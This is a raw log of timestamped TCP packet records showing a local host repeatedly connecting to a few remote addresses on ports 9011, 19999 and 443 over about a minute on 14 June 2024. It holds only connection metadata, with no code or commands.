Jun 14, 2024 16:39:41.491044044 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.496073961 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:41.633935928 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.640001059 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:41.754633904 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.760416985 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:41.862957001 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.867721081 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:41.977680922 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.982408047 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:42.101710081 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:42.101881981 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:42.102375031 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:42.106499910 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:42.107108116 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:42.543041945 CEST	51536	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:42.548090935 CEST	19999	51536	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:42.548182011 CEST	51536	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:42.553174019 CEST	51536	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:44.048386097 CEST	51537	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:44.053281069 CEST	19999	51537	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:44.053347111 CEST	51537	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:44.053385019 CEST	51537	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:44.058258057 CEST	19999	51537	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:44.079441071 CEST	51537	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.079001904 CEST	51538	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.083765984 CEST	19999	51538	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:45.083971024 CEST	51538	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.461364031 CEST	51539	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.466253996 CEST	19999	51539	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:45.466366053 CEST	51539	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.467797041 CEST	51539	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:45.472676039 CEST	19999	51539	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:45.520411015 CEST	51539	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:47.125660896 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.130584002 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.130678892 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.131218910 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.136204958 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.236753941 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.241650105 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.335644960 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.341465950 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.438473940 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.658207893 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.658415079 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.663389921 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.723735094 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.728661060 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.818521023 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.823982000 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.839232922 CEST	9011	51540	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:47.839473009 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:47.893073082 CEST	51543	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:47.898052931 CEST	19999	51543	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:47.898267031 CEST	51543	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:47.908675909 CEST	51543	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:47.913651943 CEST	19999	51543	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:47.945293903 CEST	51543	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:47.945374012 CEST	51540	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:48.314774036 CEST	51544	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:48.319847107 CEST	19999	51544	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:48.319987059 CEST	51544	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:48.320050955 CEST	51544	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:48.325355053 CEST	19999	51544	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:48.351077080 CEST	51544	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:49.906006098 CEST	51545	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:49.910969019 CEST	19999	51545	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:49.911343098 CEST	51545	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:49.911448002 CEST	51545	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:49.916297913 CEST	19999	51545	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:49.946190119 CEST	51545	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:52.210402966 CEST	51648	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:52.215598106 CEST	19999	51648	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:52.215679884 CEST	51648	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:52.217719078 CEST	51648	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:52.222575903 CEST	19999	51648	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:52.270536900 CEST	51648	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:52.852716923 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:52.857553005 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:52.857641935 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:52.858139992 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:52.862978935 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:52.890429020 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:52.895467043 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:52.975656986 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:52.980674982 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.077049971 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.082937002 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.163156033 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.168009043 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.263572931 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.268625975 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.347817898 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.352720022 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.428009033 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.433449030 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.504585981 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.509535074 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.589164019 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:53.589221001 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.589310884 CEST	51685	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:53.594662905 CEST	9011	51685	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:57.075707912 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:57.075804949 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:57.075892925 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:57.077091932 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:57.077132940 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:57.910883904 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:57.911111116 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:57.955790997 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:57.955879927 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:57.956851959 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:57.959959984 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.000499964 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.232801914 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.232861996 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.232906103 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.233063936 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.233063936 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.233145952 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.233221054 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.235893965 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.235969067 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.235976934 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.236011982 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.236044884 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.236135960 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.236232042 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.245143890 CEST	51911	443	192.168.2.5	20.12.23.50
Jun 14, 2024 16:39:58.245178938 CEST	443	51911	20.12.23.50	192.168.2.5
Jun 14, 2024 16:39:58.608144999 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.614013910 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.614106894 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.614787102 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.620003939 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.646043062 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.651251078 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.720632076 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.725860119 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.787935019 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.793055058 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.867572069 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.872478962 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:58.948261976 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:58.953752995 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.022058010 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:59.026885986 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.103645086 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:59.110465050 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.183475018 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:59.188637018 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.259601116 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:59.264595032 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.298440933 CEST	9011	51990	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:59.298583984 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:59.368208885 CEST	51990	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.324440956 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.329535961 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.329627991 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.330277920 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.335608959 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.358200073 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.364340067 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.427460909 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.432502985 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.490112066 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.495182991 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.556266069 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.561976910 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.632890940 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.637998104 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.692917109 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.697722912 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.825181961 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.830179930 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.887770891 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.892580032 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:04.943352938 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:04.948358059 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:05.004853010 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:05.009663105 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:05.024807930 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:05.024859905 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:05.024923086 CEST	52054	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:05.029774904 CEST	9011	52054	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.055959940 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.061682940 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.061784983 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.062309027 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.068384886 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.086525917 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.091504097 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.142010927 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.148708105 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.207561016 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.212471008 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.290153027 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.295135021 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.354173899 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.359153986 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.403285980 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.408180952 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.461615086 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.466417074 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.509248018 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.514225006 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.585169077 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.590115070 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.637418985 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.643172979 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.698678970 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.703829050 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.749937057 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.756187916 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.770123005 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:10.770313025 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.770313025 CEST	52055	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:10.775227070 CEST	9011	52055	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:15.806183100 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.811239004 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:15.811363935 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.811956882 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.817183971 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:15.838015079 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.842880011 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:15.893713951 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.899007082 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:15.957751036 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:15.962872028 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.016448021 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.021517038 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.223840952 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.228733063 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.295953035 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.301822901 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.350730896 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.355679035 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.396409988 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.402015924 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.450762033 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.455610991 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.497664928 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.502876043 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.518388033 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:16.518534899 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.518534899 CEST	52056	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:16.523761034 CEST	9011	52056	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.549035072 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.553955078 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.554053068 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.554846048 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.559700012 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.586318970 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.591331959 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.621062040 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.626779079 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.689186096 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.694227934 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.771768093 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.776902914 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.826448917 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.831254959 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.904634953 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.909562111 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.946901083 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.951706886 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:21.990427971 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:21.995250940 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.041600943 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.046483040 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.092955112 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.097922087 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.172035933 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.176835060 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.227965117 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.232769966 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.240921974 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:22.241017103 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.241054058 CEST	52057	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:22.245805025 CEST	9011	52057	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.261395931 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.266983986 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.267467976 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.268215895 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.274355888 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.274610996 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.279812098 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.337630033 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.343580008 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.385281086 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.390204906 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.417721033 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.422764063 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.446890116 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.452908993 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.484762907 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.490286112 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.524650097 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.529563904 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.564980030 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.570355892 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.622220039 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.627886057 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.660128117 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.665374994 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.704710960 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.951677084 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.951755047 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.956568003 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.956615925 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:27.962322950 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.974961996 CEST	9011	52058	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:27.975040913 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:28.060590982 CEST	52058	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.045428991 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.050477028 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.050559044 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.051481962 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.057025909 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.077465057 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.082901955 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.102576017 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.108531952 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.139849901 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.145067930 CEST	9011	52059	218.244.58.70	192.168.2.5
